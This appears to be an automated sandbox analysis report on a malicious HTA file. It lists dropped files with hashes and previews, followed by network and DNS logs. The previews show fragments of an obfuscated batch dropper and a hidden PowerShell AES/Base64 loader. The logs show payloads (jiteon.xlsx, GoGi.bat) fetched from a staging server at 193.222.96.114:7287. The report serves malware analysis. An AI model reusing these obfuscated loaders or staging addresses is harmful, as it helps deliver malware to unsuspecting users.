                                                        SHA-512:DC2F056020F6896BFFFAD62832AFD179F2ED9335F4A825558E1138202A9B5BAFABB55528CAC0317D68136B753D594AA4F3CCFCD9B2A70114C0584DCBFEC86C3C
                                                        Malicious:false
                                                        Preview:h.N)... .......A.......X\...;...{......................0.!..........{A......|u.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{...................................D{......|.....................2.....|u..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):16384
                                                        Entropy (8bit):0.07579482337093124
                                                        Encrypted:false
                                                        SSDEEP:3:7YeaGRuajn13a/Qrxh6/AllcVO/lnlZMxZNQl:7zOa53qQrn6/AOewk
                                                        MD5:E8207ABFEC3CE8068C508051179E3006
                                                        SHA1:5F8FD85935176260A344F4C0212A75B2EA306577
                                                        SHA-256:4063F3B60449BF91346976775B70BAD334B66DA8E479C750C5D3A9831223F6A1
                                                        SHA-512:CABF2572189B98FEFB6AAB58C1D15CB7B23FFE342A54EEEBA885C53E0014C458557ED20423A8D905000FA61F6FC9EFE419748FC54DA405692575D52651AC88E3
                                                        Malicious:false
                                                        Preview:.YR0.....................................;...{.......|u......{A..............{A......{A..........{A]...................2.....|u.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):338
                                                        Entropy (8bit):3.459997039905481
                                                        Encrypted:false
                                                        SSDEEP:6:kKg2/r8m2al0iJFN+SkQlPlEGYRMY9z+s3Ql2DUevat:oYrNlkkPlE99SCQl2DUevat
                                                        MD5:E4D211EAEC94715169C453F3C7528D3E
                                                        SHA1:9BCF8F3407F29C773D6ECC955B5975AA085C9FE1
                                                        SHA-256:6667DE9EF61DA9E23B285F75503622357C8770E87B96F94E50DC9B8FEACDF42E
                                                        SHA-512:0BB1AB90029C056EAE63CD33938F883887EEB3A828FF9B657519CCA91DF7956C27D0B9B08FEB3E5D2C09F0277A4F4F274FB106A6F6D7FC72DAA57A0C30A42754
                                                        Malicious:false
                                                        Preview:p...... ..........W.+...(...............................................C/.@... .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):64
                                                        Entropy (8bit):0.34726597513537405
                                                        Encrypted:false
                                                        SSDEEP:3:Nlll:Nll
                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                        Malicious:false
                                                        Preview:@...e...........................................................
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):1368
                                                        Entropy (8bit):5.414770380179797
                                                        Encrypted:false
                                                        SSDEEP:24:3qWSKco4KmZjKMs4RPTkmAmoUebIKo+mZ9tXt/NK3R88bJ0G9r9:6WSU4xc4R4mloUeW+mZ9tlNWR83+R
                                                        MD5:85509342E1C292F7D2E0AC39102FE3E8
                                                        SHA1:F16147BCFB535421F31A57A0E8D39F844BAFA332
                                                        SHA-256:71C1831583DDA80B71BDD06338DF1DC0EF7A1C1172934CDC703EC68F4BE6D70E
                                                        SHA-512:C866AC38FF059982DDA993B7210D5ADA08F5454D52B1F8D76D592ED7FC61C72D457D0A09BA73C6D6D29716B0C3D4F8113F021307132E4BBE9F6BBFDA4F94D244
                                                        Malicious:false
                                                        Preview:@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.ConfigurationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...4.................%...K... ...........System.Xml..@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:DOS batch file, ASCII text, with very long lines (51202), with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):62296
                                                        Entropy (8bit):5.999975112908781
                                                        Encrypted:false
                                                        SSDEEP:1536:ts4yFTt4kNLNofpmw3dU7pVcJqmJQBULYJebJaRVmMWVXUpQk8daktj2aVv0+x/:tITGkDofH27pAD8YdYFpQk88kd2aJ/x/
                                                        MD5:CAB2108A81D68104DD9B15EFCEDF8351
                                                        SHA1:03852C18F75CAD87F71693FB1973D9A04E8910ED
                                                        SHA-256:A2DFE970DC385F9AA1A81946C4BC41144D182DBDDB02E37CE4C5B52C9B884AAA
                                                        SHA-512:E474CE03766F8E21FDB14E072144E8E1C5FA1F30E66EA4F7A05FADE86BD783FB4DEC65D23AB01861524959A0A029CB2112074116FDBD72D02AB4794216ED95F5
                                                        Malicious:true
                                                        Preview:@echo off..set "tPxaUE=setztepY sjztepYCJztepY=1ztepY &ztepY& ztepYsztepYtaztepYrt ztepY"ztepY" /ztepYmztepYinztepY ztepY"..set "JHuzvA=&& ztepYexiztepYtztepY"..set "sWWmDL=nztepYotztepY dztepYefiztepYneztepYd ztepYsjztepYCJztepY..if %sWWmDL:ztepY=% (%tPxaUE:ztepY=%%0 %JHuzvA:ztepY=%)..::
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:Microsoft Excel 2007+
                                                        Category:dropped
                                                        Size (bytes):9842
                                                        Entropy (8bit):6.822783422329926
                                                        Encrypted:false
                                                        SSDEEP:192:KjbXbb3UNgKeK8c+sfyp/2HbdgH6D5loP:Kjz33pPc+b1I7D+
                                                        MD5:DFA28CEEF932C1605D40981A5023DAB0
                                                        SHA1:A6E8C5CDD144CB27685198FECAD8F9DEF48DFBE8
                                                        SHA-256:9E0BAC9938B4059F69ED52AF74337C38C242213ECD432746A483D44E1E74DFF6
                                                        SHA-512:28BC8A4C30E566A60280B194F5442C160F0B9C8B3DD10FA8D321035E7A3B76271373274B0D25BB8F04AC213F4293F3BDE7EE8C6FF7D77CAA2A4BA5276E0CCC80
                                                        Malicious:false
                                                        Preview:PK..........!.A7..n...........[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T.n.0..W.?D.V.........[$...x.X$...(.}'fQU...%Ql.[&.<...&YB@.l..YO$`....r.=.H.E...V....5........L..b.j"."%.5..3...N.B..?C%.*.....=..Y.K)u.b8x.R-.J.W..Q23V$..s.U....)..P....I.....].h.:C.@i...m2..3....1.. g../#..2...x|`.G....u_.;...U.O.w.j...s..4...-.Ze.N...x.e|.o,...... .1..y...s..i.......s......V7........88.....wa...:......Crh..........A..............PK..........!..U0#....L......._rels/.rels ...(...................
                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):165
                                                        Entropy (8bit):1.4377382811115937
                                                        Encrypted:false
                                                        SSDEEP:3:KVC+cAmltV:KVC+cR
                                                        MD5:9C7132B2A8CABF27097749F4D8447635
                                                        SHA1:71D7F78718A7AFC3EAB22ED395321F6CBE2F9899
                                                        SHA-256:7029AE5479F0CD98D892F570A22B2AE8302747DCFF3465B2DE64D974AE815A83
                                                        SHA-512:333AC8A4987CC7DF5981AE81238A77D123996DB2C4C97053E8BD2048A64FDCF33E1245DEE6839358161F6B5EEA6BFD8D2358BC4A9188D786295C22F79E2D635E
                                                        Malicious:false
                                                        Preview:.user ..j.o.n.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):55
                                                        Entropy (8bit):4.306461250274409
                                                        Encrypted:false
                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                        Malicious:false
                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with very long lines (2145), with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):2147
                                                        Entropy (8bit):5.779838178715233
                                                        Encrypted:false
                                                        SSDEEP:48:q2onXBS0NmhNrdR2Rd2Rxf8BmBYFSznk/kBJn3rGcTJsGcmtKWz:q5xSPh5dg+7f8BmBYFSzFx36cdHcmz
                                                        MD5:823D9DC33A7F86A3319E5DC91E2CB63B
                                                        SHA1:A407527A64E822DCD7FA0AE9EBA322429878A09C
                                                        SHA-256:202003A5881F3EA0451C758DD8C637246EB2A7D7BEDBD7DC6191015FBEEB38FA
                                                        SHA-512:E55099703BECFA1C271EBDDD5190A6502CFC5A901288CFA3FABB9A9C2280036ABB6A5AC0025F7F31A615AA27FA6E88D059D231AF4A1A0C9ED4BC250528C42A3E
                                                        Malicious:false
                                                        Preview:$host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\GoGi.bat';$gPQY='CmYpnhamYpnnmYpngmYpnemYpnEmYpnxtmYpnenmYpnsmYpniomYpnnmYpn'.Replace('mYpn', ''),'LoaUtEPdUtEP'.Replace('UtEP', ''),'MaiCYgQnMCYgQodCYgQuleCYgQ'.Replace('CYgQ', ''),'SprHTnlitrHTn'.Replace('rHTn', ''),'TrrzhRarzhRnsfrzhRorrzhRmFrzhRirzhRnarzhRlBlrzhRorzhRckrzhR'.Replace('rzhR', ''),'GetuUbXCuUbXuuUbXruUbXreuUbXntuUbXPuUbXrouUbXcuUbXesuUbXsuUbX'.Replace('uUbX', ''),'FrFEdOomBFEdOasFEdOe64FEdOStrFEdOiFEdOngFEdO'.Replace('FEdO', ''),'ReanclddLncldinencldsncld'.Replace('ncld', ''),'DjPqYejPqYcojPqYmpjPqYrejPqYssjPqY'.Replace('jPqY', ''),'IPIJhnvPIJhokPIJhePIJh'.Replace('PIJh', ''),'CopZKPiyTZKPioZKPi'.Replace('ZKPi', ''),'ElIXGDeIXGDmIXGDenIXGDtAIXGDtIXGD'.Replace('IXGD', ''),'CruXrmeuXrmatuXrmeDeuXrmcryuXrmptuXrmoruXrm'.Replace('uXrm', ''),'EJuQRntJuQRrJuQRyPJuQRoinJuQRtJuQR'.Replace('JuQR', '');powershell -w hidden;function oukWk($hMAdX){$uBEEb=[System.Security.Cryptography.Aes]::Create();$uBEEb.Mode=[System.Secu
                                                        File type:HTML document, ASCII text, with very long lines (12144), with CRLF line terminators
                                                        Entropy (8bit):3.414256201846169
                                                        TrID:
                                                        • Visual Basic Script (13500/0) 100.00%
                                                        File name:hta.hta
                                                        File size:13'193 bytes
                                                        MD5:dbc5a204c56d2c6c974bb9ce287978d4
                                                        SHA1:dca280ec6fcc06611132200b78bf9e7bd66504ef
                                                        SHA256:d8a8f1d0c357bdecb7bb471e1809231088ed6d4489355da038807aa1a73e964e
                                                        SHA512:6d169c338630b22fac4d68a35c03e48c990c467423829077c0689acfc12e462d1f9736c0b14146a85ade55c8ee775d06b6c4903b44287421a98b04a2bbdf60ea
                                                        SSDEEP:192:v3e+y2udOKE2FKvmbv22wZXiudbZv22wZXUpvuy:dKEsy
                                                        TLSH:6E4257E4025188C3E6830EF6F3957804EE2C157BBE49626865B0D413537E68893FEE9B
                                                        File Content Preview:<head>..<script language="vBsCRIPT">............Function DDVuglbxlLDq(ByVal YXynTpI).. Dim GNVetjPXcSep.. Dim MFEdIOkYQrzFGL.. MFEdIOkYQrzFGL = 59499.. Dim WDufyXOB.. WDufyXOB = cOGmqFFAvbHQ(YXynTpI).. If WDufyXOB = 7000 + 1204 Then..
Timestamp                             Source Port  Dest Port  Source IP       Dest IP
Apr 20, 2024 16:05:04.951550961 CEST  49730        7287       192.168.2.4     193.222.96.114
Apr 20, 2024 16:05:05.159631014 CEST  7287         49730      193.222.96.114  192.168.2.4
Apr 20, 2024 16:05:05.160057068 CEST  49730        7287       192.168.2.4     193.222.96.114
Apr 20, 2024 16:05:05.161431074 CEST  49730        7287       192.168.2.4     193.222.96.114
Apr 20, 2024 16:05:05.367007971 CEST  7287         49730      193.222.96.114  192.168.2.4
Apr 20, 2024 16:05:05.367685080 CEST  7287         49730      193.222.96.114  192.168.2.4
Apr 20, 2024 16:05:05.367706060 CEST  7287         49730      193.222.96.114  192.168.2.4
Apr 20, 2024 16:05:05.367728949 CEST  7287         49730      193.222.96.114  192.168.2.4
Apr 20, 2024 16:05:05.367748976 CEST  7287         49730      193.222.96.114  192.168.2.4
Apr 20, 2024 16:05:05.367770910 CEST  7287         49730      193.222.96.114  192.168.2.4
Apr 20, 2024 16:05:05.367786884 CEST  7287         49730      193.222.96.114  192.168.2.4
Apr 20, 2024 16:05:05.367804050 CEST  7287         49730      193.222.96.114  192.168.2.4
Apr 20, 2024 16:05:05.367820024 CEST  7287         49730      193.222.96.114  192.168.2.4
Apr 20, 2024 16:05:05.367835045 CEST  7287         49730      193.222.96.114  192.168.2.4
Apr 20, 2024 16:05:05.367850065 CEST  7287         49730      193.222.96.114  192.168.2.4
Apr 20, 2024 16:05:05.367856979 CEST  49730        7287       192.168.2.4     193.222.96.114
Apr 20, 2024 16:05:05.367856979 CEST  49730        7287       192.168.2.4     193.222.96.114
Apr 20, 2024 16:05:05.367909908 CEST  49730        7287       192.168.2.4     193.222.96.114
Apr 20, 2024 16:05:05.367909908 CEST  49730        7287       192.168.2.4     193.222.96.114
Apr 20, 2024 16:05:05.368077040 CEST  7287         49730      193.222.96.114  192.168.2.4
Apr 20, 2024 16:05:05.368145943 CEST  49730        7287       192.168.2.4     193.222.96.114
Apr 20, 2024 16:05:05.370291948 CEST  49730        7287       192.168.2.4     193.222.96.114
Apr 20, 2024 16:05:05.571834087 CEST  7287         49730      193.222.96.114  192.168.2.4
Apr 20, 2024 16:05:05.932460070 CEST  49731        7287       192.168.2.4     193.222.96.114
Apr 20, 2024 16:05:06.135762930 CEST  7287         49731      193.222.96.114  192.168.2.4
Apr 20, 2024 16:05:06.135915995 CEST  49731        7287       192.168.2.4     193.222.96.114
Apr 20, 2024 16:05:06.136085033 CEST  49731        7287       192.168.2.4     193.222.96.114
Apr 20, 2024 16:05:06.344352007 CEST  7287         49731      193.222.96.114  192.168.2.4
Apr 20, 2024 16:05:06.360938072 CEST  7287         49731      193.222.96.114  192.168.2.4
Apr 20, 2024 16:05:06.360987902 CEST  7287         49731      193.222.96.114  192.168.2.4
Apr 20, 2024 16:05:06.361044884 CEST  49731        7287       192.168.2.4     193.222.96.114
Apr 20, 2024 16:05:06.361346960 CEST  7287         49731      193.222.96.114  192.168.2.4
Apr 20, 2024 16:05:06.361385107 CEST  7287         49731      193.222.96.114  192.168.2.4
Apr 20, 2024 16:05:06.361422062 CEST  7287         49731      193.222.96.114  192.168.2.4
Apr 20, 2024 16:05:06.361422062 CEST  49731        7287       192.168.2.4     193.222.96.114
Apr 20, 2024 16:05:06.361459017 CEST  7287         49731      193.222.96.114  192.168.2.4
Apr 20, 2024 16:05:06.361475945 CEST  49731        7287       192.168.2.4     193.222.96.114
Apr 20, 2024 16:05:06.361499071 CEST  7287         49731      193.222.96.114  192.168.2.4
Apr 20, 2024 16:05:06.361536980 CEST  7287         49731      193.222.96.114  192.168.2.4
Apr 20, 2024 16:05:06.361547947 CEST  49731        7287       192.168.2.4     193.222.96.114
Apr 20, 2024 16:05:06.361574888 CEST  7287         49731      193.222.96.114  192.168.2.4
Apr 20, 2024 16:05:06.361612082 CEST  7287         49731      193.222.96.114  192.168.2.4
Apr 20, 2024 16:05:06.361624002 CEST  49731        7287       192.168.2.4     193.222.96.114
Apr 20, 2024 16:05:06.407387972 CEST  49731        7287       192.168.2.4     193.222.96.114
Apr 20, 2024 16:05:06.563685894 CEST  7287         49731      193.222.96.114  192.168.2.4
Apr 20, 2024 16:05:06.563734055 CEST  7287         49731      193.222.96.114  192.168.2.4
Apr 20, 2024 16:05:06.563771009 CEST  7287         49731      193.222.96.114  192.168.2.4
Apr 20, 2024 16:05:06.563798904 CEST  49731        7287       192.168.2.4     193.222.96.114
Apr 20, 2024 16:05:06.563808918 CEST  7287         49731      193.222.96.114  192.168.2.4
Apr 20, 2024 16:05:06.563864946 CEST  7287         49731      193.222.96.114  192.168.2.4
                                                        Apr 20, 2024 16:05:06.563865900 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.563901901 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.563939095 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.563975096 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.563977003 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.564013004 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.564039946 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.564050913 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.564089060 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.564117908 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.564152956 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.564189911 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.564205885 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.564228058 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.564265966 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.564281940 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.564304113 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.564341068 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.564354897 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.609314919 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.609345913 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.609389067 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.657373905 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.766402960 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.766455889 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.766494036 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.766531944 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.766535044 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.766567945 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.766583920 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.766606092 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.766642094 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.766674042 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.766680002 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.766717911 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.766740084 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.766756058 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.766794920 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.766803026 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.766832113 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.766869068 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.766882896 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.766905069 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.766942024 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.766947985 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.766978025 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.767020941 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.767034054 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.767071009 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.767108917 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.767110109 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.767149925 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:05:06.767200947 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.767294884 CEST497317287192.168.2.4193.222.96.114
                                                        Apr 20, 2024 16:05:06.969399929 CEST728749731193.222.96.114192.168.2.4
                                                        Apr 20, 2024 16:06:14.684237003 CEST49755443192.168.2.413.107.246.41
                                                        Apr 20, 2024 16:06:14.684289932 CEST4434975513.107.246.41192.168.2.4
                                                        Apr 20, 2024 16:06:14.684360981 CEST49755443192.168.2.413.107.246.41
                                                        Apr 20, 2024 16:06:14.684545994 CEST49756443192.168.2.413.107.246.41
                                                        Apr 20, 2024 16:06:14.684628010 CEST4434975613.107.246.41192.168.2.4
                                                        Apr 20, 2024 16:06:14.684719086 CEST49755443192.168.2.413.107.246.41
                                                        Apr 20, 2024 16:06:14.684734106 CEST4434975513.107.246.41192.168.2.4
                                                        Apr 20, 2024 16:06:14.684771061 CEST49756443192.168.2.413.107.246.41
                                                        Apr 20, 2024 16:06:14.684880972 CEST49756443192.168.2.413.107.246.41
                                                        Apr 20, 2024 16:06:14.684921026 CEST4434975613.107.246.41192.168.2.4
                                                        Apr 20, 2024 16:06:15.013262987 CEST4434975613.107.246.41192.168.2.4
                                                        Apr 20, 2024 16:06:15.013385057 CEST49756443192.168.2.413.107.246.41
                                                        Apr 20, 2024 16:06:15.015037060 CEST49756443192.168.2.413.107.246.41
                                                        Apr 20, 2024 16:06:15.015090942 CEST4434975613.107.246.41192.168.2.4
                                                        Apr 20, 2024 16:06:15.015435934 CEST4434975613.107.246.41192.168.2.4
                                                        Apr 20, 2024 16:06:15.016830921 CEST49756443192.168.2.413.107.246.41
                                                        Apr 20, 2024 16:06:15.017524004 CEST4434975513.107.246.41192.168.2.4
                                                        Apr 20, 2024 16:06:15.017606974 CEST49755443192.168.2.413.107.246.41
                                                        Apr 20, 2024 16:06:15.018910885 CEST49755443192.168.2.413.107.246.41
                                                        Apr 20, 2024 16:06:15.018918037 CEST4434975513.107.246.41192.168.2.4
                                                        Apr 20, 2024 16:06:15.019227028 CEST4434975513.107.246.41192.168.2.4
                                                        Apr 20, 2024 16:06:15.020342112 CEST49755443192.168.2.413.107.246.41
                                                        Apr 20, 2024 16:06:15.064126015 CEST4434975613.107.246.41192.168.2.4
                                                        Apr 20, 2024 16:06:15.068120003 CEST4434975513.107.246.41192.168.2.4
                                                        Apr 20, 2024 16:06:15.219681025 CEST4434975513.107.246.41192.168.2.4
                                                        Apr 20, 2024 16:06:15.219742060 CEST4434975513.107.246.41192.168.2.4
                                                        Apr 20, 2024 16:06:15.219831944 CEST4434975513.107.246.41192.168.2.4
                                                        Apr 20, 2024 16:06:15.219903946 CEST4434975513.107.246.41192.168.2.4
                                                        Apr 20, 2024 16:06:15.219978094 CEST49755443192.168.2.413.107.246.41
                                                        Apr 20, 2024 16:06:15.222875118 CEST49755443192.168.2.413.107.246.41
                                                        Apr 20, 2024 16:06:15.222894907 CEST4434975513.107.246.41192.168.2.4
                                                        Apr 20, 2024 16:06:15.222903013 CEST49755443192.168.2.413.107.246.41
                                                        Apr 20, 2024 16:06:15.222909927 CEST4434975513.107.246.41192.168.2.4
                                                        Apr 20, 2024 16:06:15.362694025 CEST4434975613.107.246.41192.168.2.4
                                                        Apr 20, 2024 16:06:15.362741947 CEST4434975613.107.246.41192.168.2.4
                                                        Apr 20, 2024 16:06:15.362936020 CEST4434975613.107.246.41192.168.2.4
                                                        Apr 20, 2024 16:06:15.363147974 CEST49756443192.168.2.413.107.246.41
                                                        Apr 20, 2024 16:06:15.363148928 CEST49756443192.168.2.413.107.246.41
                                                        Apr 20, 2024 16:06:15.363148928 CEST49756443192.168.2.413.107.246.41
                                                        Apr 20, 2024 16:06:15.673096895 CEST49756443192.168.2.413.107.246.41
                                                        Apr 20, 2024 16:06:15.673157930 CEST4434975613.107.246.41192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 20, 2024 16:05:10.735976934 CEST | 1.1.1.1 | 192.168.2.4 | 0x9bb1 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Apr 20, 2024 16:05:10.735976934 CEST | 1.1.1.1 | 192.168.2.4 | 0x9bb1 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Apr 20, 2024 16:06:14.683252096 CEST | 1.1.1.1 | 192.168.2.4 | 0x1357 | No error (0) | shed.dual-low.part-0013.t-0009.t-msedge.net | part-0013.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Apr 20, 2024 16:06:14.683252096 CEST | 1.1.1.1 | 192.168.2.4 | 0x1357 | No error (0) | part-0013.t-0009.t-msedge.net | | 13.107.246.41 | A (IP address) | IN (0x0001) | false
Apr 20, 2024 16:06:14.683252096 CEST | 1.1.1.1 | 192.168.2.4 | 0x1357 | No error (0) | part-0013.t-0009.t-msedge.net | | 13.107.213.41 | A (IP address) | IN (0x0001) | false
                                                        • otelrules.azureedge.net
                                                        • 193.222.96.114:7287
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 193.222.96.114 | 7287 | 7332 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Apr 20, 2024 16:05:05.161431074 CEST | 80 | OUT | GET /jiteon.xlsx HTTP/1.1
Host: 193.222.96.114:7287
Connection: Keep-Alive
Apr 20, 2024 16:05:05.367007971 CEST | 17 | IN | HTTP/1.1 200 OK


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 193.222.96.114 | 7287 | 7332 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Apr 20, 2024 16:05:06.136085033 CEST | 53 | OUT | GET /GoGi.bat HTTP/1.1
Host: 193.222.96.114:7287
Apr 20, 2024 16:05:06.344352007 CEST | 17 | IN | HTTP/1.1 200 OK


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49756 | 13.107.246.41 | 443 | 7500 | C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
Timestamp | Bytes transferred | Direction | Data
